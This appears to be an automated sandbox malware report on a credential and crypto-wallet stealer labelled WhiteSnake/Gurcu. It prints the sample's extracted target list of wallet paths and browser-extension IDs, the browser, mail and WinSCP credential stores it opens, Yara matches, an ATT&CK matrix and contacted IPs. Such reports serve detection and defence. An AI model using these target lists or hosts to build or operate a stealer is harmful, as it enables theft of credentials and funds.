name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>.txt;.doc;.xls;.kbd;.pdf</string><string>Grabber\Desktop Files</string></a0
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: TC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>.txt;.doc;.xls;.kbd;.pdf</string><string>Grabber\Desktop Files</string></a0
Source: tDLozbx48F.exe, 00000001.00000002.1261960413.0000022E4A67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: TC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>.txt;.doc;.xls;.kbd;.pdf</string><string>Grabber\Desktop Files</string></a0
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <article class="elementor-post elementor-grid-item post-17797 post type-post status-publish format-standard has-post-thumbnail hentry category-cryptominer category-trojan tag-armory tag-bitcoin tag-brave tag-bytecoin tag-chrome tag-chromium tag-coinomi tag-comodo tag-crypto-mining tag-cryptocurrency tag-cybercrime tag-discord tag-edge tag-electrum tag-enlisted tag-epicprivacy tag-ethereum tag-gamers tag-gaming tag-github tag-guarda tag-gui tag-http-service tag-iridium tag-jaxx tag-malware tag-mario-movie tag-monero tag-nsis-installer tag-opera tag-slimjet tag-super-mario-bros tag-super-mario-forever tag-super-mario-forever-v702e tag-supremebot tag-trojan tag-umbral-stealer tag-ur tag-vivaldi tag-windows tag-xmr tag-xmr-miner tag-yandex tag-zcash ast-archive-post">

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tDLozbx48F.exe PID: 4212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tDLozbx48F.exe PID: 5204, type: MEMORYSTR

Remote Access Functionality

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580486000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58045A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580457000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58058A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A787000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52922000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58052B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58038E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580364000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5296B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5291F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580593000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5298B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A78000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A75B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5298E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5294E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A7D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580537000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5803CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58048C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A802000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A75E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580596000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58053A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58045D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5805AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B5296E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A7D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F580437000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F58052E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B529B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1261960413.0000022E4A8E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2428626323.0000021B52AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2426367415.000001F5804E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	2 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	1 Timestomp	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	1 Screen Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	1 DLL Side-Loading	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File Deletion	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	151 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	11 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tDLozbx48F.exe	91%	ReversingLabs	ByteCode-MSIL.Trojan.WhiteSnake
tDLozbx48F.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe	91%	ReversingLabs	ByteCode-MSIL.Trojan.WhiteSnake

Source	Detection	Scanner	Label
http://65.21.49.163:80802	0%	Avira URL Cloud	safe
http://51.77.125.6	0%	Avira URL Cloud	safe
http://46.226.106.173	0%	Avira URL Cloud	safe
https://partnercentral.cyble.com/partner/registration	0%	Avira URL Cloud	safe
http://cybereason.com/eQJtPTLM8F?s=161Khttp://cybereason.com/YZwliMowVX?11=0Ehttp://youtube.kz/fBQEE	0%	Avira URL Cloud	safe
http://46.226.106.173:80802	0%	Avira URL Cloud	safe
http://138.201.197.74:8080	0%	Avira URL Cloud	safe
http://66.42.56.128:80	0%	Avira URL Cloud	safe
http://185.189.159.121:8001/%50%57%4F%59%66%5F%63%61%6C%69%40%38%38%38%36%38%33%5F%72%65%70%6F%72%74	0%	Avira URL Cloud	safe
http://youtube.kz/vNKzHG6mpr?79=2	0%	Avira URL Cloud	safe
http://149.28.31.122:8080	0%	Avira URL Cloud	safe
http://46.235.26h	0%	Avira URL Cloud	safe
http://18.191.188.207:80	0%	Avira URL Cloud	safe
http://167.86.115.P	0%	Avira URL Cloud	safe
https://164.90.185.9:443	0%	Avira URL Cloud	safe
http://46.226.106.	0%	Avira URL Cloud	safe
http://115.231.163.168:8082	0%	Avira URL Cloud	safe
https://amibreached.com/	0%	Avira URL Cloud	safe
http://47.110.140.182:8080	0%	Avira URL Cloud	safe
https://partnernetwork.cyble.com/	0%	Avira URL Cloud	safe
https://wpadvancedads.com/	0%	Avira URL Cloud	safe
http://140.238.218.94:8080	0%	Avira URL Cloud	safe
http://51.77.125h	0%	Avira URL Cloud	safe
http://185.189.159	0%	Avira URL Cloud	safe
http://cybereason.com/uB78yv4j06?20=1Ghttp://twitter.com/78d0XJWYXX?147=0Mhttp://blog.cyble.com/vcDA	0%	Avira URL Cloud	safe
https://amibreached.com	0%	Avira URL Cloud	safe
http://youtube.kz/G4XvFNPg1L?27=1	0%	Avira URL Cloud	safe
http://65.21.49.h	0%	Avira URL Cloud	safe
